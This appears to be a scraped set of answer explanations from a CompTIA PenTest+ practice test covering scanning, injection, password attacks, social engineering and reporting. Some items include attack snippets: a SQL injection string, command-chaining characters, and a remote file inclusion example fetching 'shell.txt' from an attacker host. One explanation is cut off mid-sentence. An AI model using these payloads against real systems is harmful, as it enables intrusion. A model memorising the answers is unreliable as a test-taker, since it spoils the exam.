Free CompTIA PenTest+ Practice Test to Ace the (PT0-003) Exam

Fuzzing is an automated testing technique that feeds a program a wide range of invalid inputs to see if it crashes, hangs, or exhibits other unexpected behavior, which can indicate vulnerabilities like buffer overflows.

The input is crafted to alter the logic of a SQL query. The `’` closes the intended string, `OR 1=1` creates a condition that is always true, and `–` comments out the rest of the original query.

ExifTool is a powerful command-line utility specifically designed to read, write, and edit metadata information in a wide variety of file types, including PDFs, images, and documents.

Password spraying involves trying a single, common password (like ‘Winter2025’) against many different user accounts. This is effective because it avoids repeated failed attempts on any single account, thus flying under the radar of most lockout policies.

A SYN scan sends a SYN packet and waits for a SYN/ACK response. If one is received, the port is open, and the scanner immediately sends a RST packet to tear down the connection before it is fully established.

The User Interaction (UI) metric is set to ‘R’ for Required, meaning the vulnerability can only be exploited if a user takes some action, such as clicking a link or opening a malicious file.

A SIEM’s core capability is to centralize security data from firewalls, servers, IDS/IPS, and other sources, and then use rules to correlate events and generate alerts for potential threats.

WPA3-Enterprise builds upon WPA2-Enterprise, using the 802.1X standard for authentication, typically against a RADIUS server. It offers the strongest security with individual user credentials and enhanced cryptographic protections.

This attack corrupts the ARP cache of a victim machine, causing it to send network traffic intended for the gateway to the attacker’s machine instead. This facilitates on-path (man-in-the-middle) attacks.

A good report translates technical findings into business risk and provides clear, prioritized steps the organization can take to improve its security posture.

Budgeting is part of the initial pre-engagement interactions but is not one of the seven formal technical and procedural sections of the PTES framework itself.

Known as a ‘shebang,’ this line tells the system’s program loader that the script should be executed using the Bash interpreter located at `/bin/bash`.

A successful zone transfer dumps the entire DNS database for the domain, revealing the internal network structure by listing all hosts (A records), aliases (CNAMEs), and other records.

Persistence mechanisms, such as creating new user accounts, scheduled tasks, or startup services, are designed to allow an attacker to regain access to a system even if the initial exploit is no longer effective.

Clickjacking, or UI redressing, involves loading a site in a transparent iframe over a legitimate-looking page. When the user clicks on a visible button, they are actually clicking on a button on the hidden page.

This header tells the browser whether it is allowed to render a page in a `

This is a classic social engineering tactic. The drives contain malware (e.g., a reverse shell payload or keylogger) that executes when an unsuspecting employee opens a file on the drive.

Drozer is a comprehensive security and attack framework for Android. It allows a tester to assume the role of an app to interact with other apps, the underlying OS, and the hardware.

The scanner correctly identified the vulnerable software version but failed to account for a mitigating control (the WAF), leading to a report of an exploitable vulnerability that, in context, is not. This is a common cause of false positives.

The `$6$` prefix indicates a SHA-512 hash, which is strong and salted. Tools like Hashcat and John the Ripper are designed to perform dictionary, brute-force, and rule-based attacks against such hashes.

The `-O` flag enables Nmap’s operating system detection feature, which analyzes responses to a series of probes to make an educated guess about the underlying OS.

The `RemoteSigned` policy is a common security setting that provides a good balance: it allows local development and testing while protecting against potentially malicious scripts downloaded from the internet.

Failing to remove backdoors, user accounts, or tools from a client’s network leaves them vulnerable to future attacks and is a major professional liability for the tester.

Tailgating is the act of following an authorized person through a secured entrance without providing credentials. It often exploits common courtesy.

If a bucket is publicly readable, anyone on the internet who can find it can download its contents, leading to a potentially massive data breach if sensitive information is stored there.

The tester is exploiting a system weakness (unquoted service path) to elevate their access from a standard user to a higher privilege level (likely SYSTEM, as services often run with high privileges).

A container escape breaks the isolation boundary between the container and the host, allowing an attacker to gain control over the host system itself, which is a critical security failure.

This is the precise definition of the principle. It aims to limit the damage that can be caused by an accident, error, or malicious attack by restricting access rights.

To minimize business impact, clients often restrict testing to off-peak hours and explicitly forbid tests that could cause outages, such as DoS attacks.

PowerShell is Microsoft’s task automation and configuration management framework, consisting of a command-line shell and associated scripting language built on the .NET Framework.

This type of test simulates an external attacker with no inside information, requiring the tester to perform extensive reconnaissance to discover the attack surface, which aligns perfectly with the scenario.

This is the classic description of a SYN flood, a type of Denial-of-Service attack that exploits the TCP three-way handshake process by leaving many connections in a half-open state.

The `os.system()` function executes a command in a subshell. If user input is passed to this function without proper sanitization, an attacker can inject additional OS commands (e.g., using `;` or `&&` on Linux).

The ‘s’ in the user execute position indicates the SUID bit is set. If this file is owned by root, any user who executes it will do so with root privileges, making it a potential vector for privilege escalation.

The Executive Summary is written for management and decision-makers. It avoids technical jargon and focuses on the strategic implications of the findings.

The core function of an SSL certificate is to authenticate the server’s identity. When it expires, this authentication fails, which undermines both the confidentiality and integrity of the communication channel by making on-path (man-in-the-middle) attacks easier.

DLP solutions are specifically designed to monitor, detect, and block the unauthorized exfiltration of sensitive data. They use pattern matching (like regular expressions for credit card numbers) to identify and act on policy violations.

Proper network segmentation would place IoT devices on an isolated network segment (VLAN) with strict firewall rules preventing them from initiating connections to critical internal systems, thus containing the impact of a compromise.

ICS and SCADA devices are often not designed to handle unexpected network traffic. An aggressive port scan or malformed packet can cause them to fail, which could have serious consequences in a physical process (e.g., shutting down a power grid).

An evil twin attack involves creating a fraudulent Wi-Fi access point that appears to be legitimate, with the goal of tricking users into connecting to it to intercept their traffic.

A reverse shell initiates an outbound connection from the compromised server back to a listener on the tester’s machine. Outbound connections are often less restricted by firewalls, making this the most likely successful method.

Mimikatz is a well-known post-exploitation tool famous for its ability to extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory on Windows systems.

This is the classic definition of a buffer overflow. When more data is written to a buffer than it can hold, the excess data overwrites adjacent memory, which can lead to crashes or arbitrary code execution.

CSRF exploits the trust a site has in a user’s browser. The attacker forges a request (e.g., to transfer money or change a password) and tricks the victim, who is already logged in, into executing it.

Pretexting is the act of creating and using an invented scenario (the pretext) to engage a targeted victim in a way that increases the chance the victim will divulge information or perform actions that would be unlikely in ordinary circumstances.

Allowing unauthenticated access to network shares is a classic example of a misconfiguration that violates security best practices and exposes data.

Biometric scanners, locks, fences, and security guards are all examples of physical controls designed to protect physical assets and facilities.

A rootkit is a collection of malicious software tools designed to enable administrator-level access to a computer while obscuring its presence by modifying core system components and APIs.

RFI is a high-severity vulnerability where a web application includes and executes a remote file (e.g., `?file=http://attacker.com/shell.txt`), allowing the attacker to run arbitrary code on the server.

A rainbow table is a pre-computed lookup table used for reversing cryptographic hash functions. It is more space-efficient than a simple hash lookup table and is effective against unsalted hashes.

Shadow IT introduces assets that are not monitored, patched, or configured according to corporate security standards, creating a significant blind spot and attack surface.

An SPF record is a DNS TXT record that lists the mail servers authorized to send email for a specific domain. Receiving mail servers can check this record to verify the sender’s authenticity.

This is the classic definition of session hijacking, where an attacker steals a valid session identifier (like a cookie) and replays it to the server to impersonate the legitimate user.

This is the correct expansion. ATT&CK is a knowledge base of adversary behavior, structured around Tactics (the ‘why’ or goal), Techniques (the ‘how’ an adversary achieves a goal), and Procedures (the specific implementation of a technique).

This is the core distinction. SAST examines the application from the inside out (white-box), while DAST interacts with the running application from the outside in (black-box), simulating attacks.

CeWL is a Ruby application designed to spider a URL to a specified depth and return a list of words that can then be used in a password cracker like John the Ripper or Hashcat.

The `filtered` state means that Nmap’s probes are not receiving a response, which is typically because a firewall, router ACL, or other network filtering device is silently dropping the packets.

The Attestation of Compliance (AOC) is the final document that serves as official proof to the payment brands (Visa, MasterCard, etc.) that an organization has successfully completed a PCI DSS assessment.

The exploit creates the opening, and the payload is the code that runs through that opening to achieve the attacker’s goal, such as creating a reverse shell or adding a user.

By defining infrastructure in code, organizations can prevent manual configuration errors and ‘configuration drift,’ ensuring every deployed environment is built to the same security standards automatically.

In a reflected attack, the malicious script is part of the request sent to the web server, which is then reflected back to the user’s browser, which executes the script. It is not stored permanently.

Chain of custody is a critical forensic process that documents who handled the evidence, when, and for what purpose. This is vital if the findings need to hold up in a legal proceeding.

Threat modeling is a systematic approach to security where potential threats are identified, categorized, and analyzed, often using methodologies like STRIDE, to inform the design of security controls.

By breaking the data into small pieces and sending them intermittently, often hidden within normal-looking traffic like DNS or HTTP requests, an attacker can evade detection systems that are looking for high-bandwidth anomalies.

An interception proxy, such as Burp Suite or OWASP ZAP, is an essential tool for web application testing, allowing the tester to manipulate requests and analyze responses in detail.

By adding a unique, random salt to each password before hashing, even identical passwords will produce different hashes. This renders pre-computed rainbow tables ineffective.

The credentials from the metadata service grant the attacker all the permissions of the attached IAM role, allowing them to potentially access S3 buckets, databases, or other EC2 instances.

Pivoting uses an initial foothold as a stepping stone. The compromised machine acts as a proxy or gateway, allowing the tester to ‘pivot’ their attack into internal networks.

This technique, specifically known as double-tagging, is a form of VLAN hopping. It exploits the way some switches process 802.1Q tags to send traffic into a VLAN that the attacker’s port is not a member of.

The ‘zero-day’ refers to the fact that the vendor has had zero days to create a patch for the vulnerability because they are unaware of it. This makes such vulnerabilities particularly dangerous.

This is the fundamental distinction. A vulnerability scan provides a list of ‘what might be broken,’ whereas a penetration test goes a step further to confirm if those weaknesses are truly exploitable and what level of access can be gained.